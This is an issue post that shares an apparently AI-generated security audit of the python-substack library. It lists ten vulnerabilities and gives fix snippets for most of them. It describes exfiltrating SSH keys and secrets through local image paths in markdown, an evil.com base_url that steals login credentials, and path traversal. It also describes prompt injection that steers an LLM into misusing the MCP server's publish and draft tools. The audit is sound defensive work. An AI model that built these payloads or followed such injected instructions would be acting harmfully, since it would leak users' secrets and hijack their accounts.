Security Audit: python-substack #44
Description
As I wanted to know if this application was secure, I pushed it through Claude Code on MAX setting. Here are its findings. (most seem harmless to me because the dev should always be in control -- but maybe worth looking into it?)
CRITICAL
1. Arbitrary File Read + Exfiltration via get_image() — api.py:497-516
This is the most dangerous finding. The get_image() method accepts an arbitrary string, checks if it exists on the local filesystem, reads the entire file regardless of type, and uploads it to Substack's servers:
```python
if os.path.exists(image):
    with open(image, "rb") as file:
        image = b"data:image/jpeg;base64," + base64.b64encode(file.read())
response = self._session.post(f"{self.publication_url}/image", data={"image": image})
```
Attack vectors:
- Malicious Markdown file — `from_markdown()` calls `api.get_image(image_url)` at lines 619-622 and 641-644. A markdown document whose image references point at local file paths will cause those files to be read, base64-encoded, and uploaded to Substack's image CDN.
- Malicious YAML draft — `publish_post.py:65-66` calls `api.get_image(item.get("src"))` with values taken straight from the YAML file.
- MCP tool — `post_draft_from_markdown` passes markdown to `from_markdown(markdown, api=client)`, so a prompt-injection attack against the LLM could inject image references to sensitive files.
Impact: Exfiltration of any file the process can read — SSH keys, cloud credentials, .env secrets, source code, /etc/passwd, etc. The file contents end up as a publicly-accessible image URL on Substack's CDN.
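One way to mitigate this is to refuse anything outside an explicit base directory and image-extension allowlist before reading the file. A minimal sketch (the function name `safe_read_image`, the `base_dir` parameter, and the `ALLOWED_EXTENSIONS` set are my assumptions, not the library's API):

```python
import base64
import os

# Assumption: only these extensions should ever be uploaded as images.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}

def safe_read_image(path: str, base_dir: str) -> bytes:
    """Read a local image only if it stays inside base_dir and looks like an image."""
    real = os.path.realpath(path)
    base = os.path.realpath(base_dir)
    # Reject anything that escapes the allowed directory (e.g. ../../etc/passwd
    # or an absolute path like ~/.ssh/id_rsa after expansion).
    if os.path.commonpath([real, base]) != base:
        raise ValueError(f"path escapes allowed directory: {path}")
    if os.path.splitext(real)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"not an allowed image type: {path}")
    with open(real, "rb") as f:
        return b"data:image/jpeg;base64," + base64.b64encode(f.read())
```

This still does not verify the file is a real image (magic-byte checks would be a further step), but it closes the arbitrary-read hole.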
2. SSRF / Credential Theft via base_url — api.py:61
```python
self.base_url = base_url or "https://substack.com/api/v1"
```
No validation at all. If an attacker convinces a user to initialize `Api(base_url="https://evil.com/api/v1", email=..., password=...)`, the `login()` method at line 145 sends their Substack email and password in cleartext JSON to the attacker's server:
```python
response = self._session.post(
    f"{self.base_url}/login",
    json={"email": email, "password": password, ...},
)
```
The same session (with cookies) is then used for all subsequent requests, so any response from the evil server that sets cookies would persist.
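A simple allowlist on the host would close this. A sketch (the function name and the `ALLOWED_HOSTS` set are assumptions, not existing library code):

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"substack.com"}  # assumption: only the official API host

def validate_base_url(base_url: str) -> str:
    """Reject base URLs that don't point at Substack over HTTPS."""
    parsed = urlparse(base_url)
    if parsed.scheme != "https":
        raise ValueError(f"insecure scheme: {base_url}")
    host = parsed.hostname or ""
    # Exact match or a *.substack.com subdomain; the leading dot in the
    # suffix check prevents lookalikes such as evilsubstack.com.
    if host not in ALLOWED_HOSTS and not host.endswith(".substack.com"):
        raise ValueError(f"untrusted host: {base_url}")
    return base_url
```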
HIGH
3. MCP Server as Attack Amplifier — mcp_server.py
The MCP server creates a fresh, fully-authenticated `Api` client on every single tool call (`get_api()`). It exposes destructive operations:
- `post_draft_from_markdown` — create + publish posts in one call
- `publish_draft` — publish any draft by ID
- `put_draft` — arbitrary field updates via `**update_payload` kwargs
A prompt-injection attack (malicious content in a webpage, email, or document that an LLM is reading) could instruct the model to call these tools to:
- Publish spam/phishing posts to the user's Substack
- Modify existing drafts with malicious content
- Exfiltrate data via the markdown image path trick (finding #1)
4. put_draft kwargs injection — mcp_server.py:231, api.py:427-430
```python
# MCP tool
return client.put_draft(draft_id, **update_payload)

# Api method
response = self._session.put(
    f"{self.publication_url}/drafts/{draft}",
    json=kwargs,
)
```
`update_payload` is an arbitrary `Dict[str, Any]` passed directly as `**kwargs` and then as the JSON body. An attacker can inject any field the Substack API accepts — potentially changing post visibility, audience, bylines, or other fields the library doesn't intend to expose.
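The usual fix is to filter the payload against an explicit field allowlist before it ever reaches the HTTP layer. A sketch (the field names in `ALLOWED_DRAFT_FIELDS` are illustrative assumptions, not a confirmed list of what the tool should expose):

```python
from typing import Any, Dict

# Assumption: the only fields the MCP tool intends to let callers update.
ALLOWED_DRAFT_FIELDS = {"draft_title", "draft_subtitle", "draft_body"}

def filter_draft_payload(update_payload: Dict[str, Any]) -> Dict[str, Any]:
    """Raise on any field not explicitly allowlisted, instead of forwarding it."""
    unknown = set(update_payload) - ALLOWED_DRAFT_FIELDS
    if unknown:
        raise ValueError(f"disallowed draft fields: {sorted(unknown)}")
    return update_payload
```

Rejecting unknown keys loudly (rather than silently dropping them) makes injection attempts visible in logs.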
MEDIUM
5. Insecure Cookie Storage — api.py:180-188
```python
def export_cookies(self, path: str = "cookies.json"):
    with open(path, "w") as f:
        json.dump(cookies, f)
```
Session cookies (which grant full account access) are written with default file permissions (typically 0644, world-readable). No `os.chmod(path, 0o600)`. Anyone on the system can read them.
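The safer pattern is to create the file with owner-only permissions from the start, so there is no window in which it is world-readable. A sketch (function name is mine, not the library's):

```python
import json
import os

def export_cookies_secure(cookies: dict, path: str = "cookies.json") -> None:
    """Write cookies to a file readable only by the owner."""
    # The mode argument to os.open only applies when the file is created;
    # chmod afterwards covers the case where the file already existed 0644.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        json.dump(cookies, f)
    os.chmod(path, 0o600)
```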
6. Unrestricted call() Method — api.py:684-700
```python
def call(self, endpoint, method, **params):
    response = self._session.request(
        method=method,
        url=f"{self.publication_url}/{endpoint}",
        params=params,
    )
```
`endpoint` is unsanitized. An attacker controlling it could use path traversal (`../../admin/something`) to hit arbitrary endpoints on the Substack domain with the user's authenticated session.
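A defensive check could normalise the path and allow only simple relative segments. A sketch (the function and the segment pattern are assumptions, not existing library code):

```python
import posixpath
import re

SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")

def validate_endpoint(endpoint: str) -> str:
    """Allow only simple relative paths like 'drafts/123'."""
    # Normalise first so 'a/./b' and 'a//b' collapse before inspection.
    normalized = posixpath.normpath(endpoint)
    if normalized.startswith(("/", "..")):
        raise ValueError(f"path traversal rejected: {endpoint}")
    for segment in normalized.split("/"):
        if not SAFE_SEGMENT.match(segment):
            raise ValueError(f"invalid endpoint segment: {segment!r}")
    return normalized
```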
7. Silent Auth Failure Swallowing — api.py:165-169
```python
def signin_for_pub(self, publication):
    try:
        output = Api._handle_response(response=response)
    except SubstackRequestException as ex:
        output = {}
```
Authentication failures are silently swallowed. This masks conditions where the session is not actually authenticated, leading to undefined behavior or allowing a MitM to silently fail auth while retaining cookies.
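Failing loudly is the straightforward fix. A sketch of the idea (the `AuthError` class, the `handle_signin` helper, and the `"user_id"` key are all assumptions for illustration):

```python
class AuthError(Exception):
    """Raised when sign-in does not produce an authenticated session."""

def handle_signin(output: dict) -> dict:
    # Refuse to continue with an empty or incomplete response instead of
    # silently substituting {} and carrying on unauthenticated.
    if not output or "user_id" not in output:
        raise AuthError("sign-in failed; refusing to continue unauthenticated")
    return output
```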
8. No Input Validation on publication_url regex — api.py:93
```python
match = re.search(r"https://(.*).substack.com", publication_url.lower())
subdomain = match.group(1) if match else None
```
The `.*` is greedy and unanchored, so `https://evil.com/foo/https://x.substack.com` would match with `subdomain = "evil.com/foo/https://x"`. The extracted value is then used to match against publication data, which could cause incorrect publication selection.
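An anchored pattern that accepts only a single DNS label fixes both the greediness and the escaping. A sketch (function name is mine):

```python
import re
from typing import Optional

# Anchored: one subdomain label, an escaped '.substack.com', nothing else before the path.
SUBDOMAIN_RE = re.compile(r"^https://([a-z0-9-]+)\.substack\.com(?:/.*)?$")

def extract_subdomain(publication_url: str) -> Optional[str]:
    """Return the Substack subdomain, or None for any non-substack.com host."""
    match = SUBDOMAIN_RE.match(publication_url.lower())
    return match.group(1) if match else None
```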
LOW
9. Credentials in Process Environment
The MCP server and examples read `EMAIL`, `PASSWORD`, `COOKIES_STRING` from env vars. These are visible in `/proc/<pid>/environ` to any process running as the same user.
10. No Rate Limiting in delete_all_drafts() — api.py:639-652
Unbounded loop that deletes all drafts. No confirmation, no rate limiting. If triggered accidentally (or via MCP), all drafts are permanently deleted.
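Guarding the loop with explicit confirmation, a throttle, and an upper bound addresses all three concerns. A sketch (function and parameter names are mine; `delete_fn` stands in for the real per-draft delete call):

```python
import time

def delete_all_drafts_safely(draft_ids, delete_fn, *, confirm=False,
                             delay_s=0.5, max_deletes=50):
    """Guarded deletion loop: confirmation gate, throttling, and an upper bound."""
    if not confirm:
        raise RuntimeError("refusing to delete drafts without confirm=True")
    deleted = []
    for draft_id in draft_ids[:max_deletes]:
        delete_fn(draft_id)
        deleted.append(draft_id)
        time.sleep(delay_s)  # throttle to avoid hammering the API
    return deleted
```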
Summary Table
| # | Severity | Issue | Location |
|---|---|---|---|
| 1 | CRITICAL | Arbitrary file read + exfiltration | api.py:497-516 |
| 2 | CRITICAL | SSRF / credential theft via base_url | api.py:61,145 |
| 3 | HIGH | MCP as prompt-injection attack surface | mcp_server.py |
| 4 | HIGH | kwargs injection in put_draft | mcp_server.py:231 |
| 5 | MEDIUM | World-readable cookie file | api.py:180-188 |
| 6 | MEDIUM | Unvalidated endpoint in call() | api.py:684-700 |
| 7 | MEDIUM | Silent auth failure swallowing | api.py:165-169 |
| 8 | MEDIUM | Broken regex for publication URL | api.py:93 |
| 9 | LOW | Credentials in environment | mcp_server.py:24-25 |
| 10 | LOW | Unbounded deletion loop | api.py:639-652 |
The #1 finding (file exfiltration via image upload) is the most practically exploitable — a single malicious markdown file or YAML draft is enough to steal secrets from the machine running this library.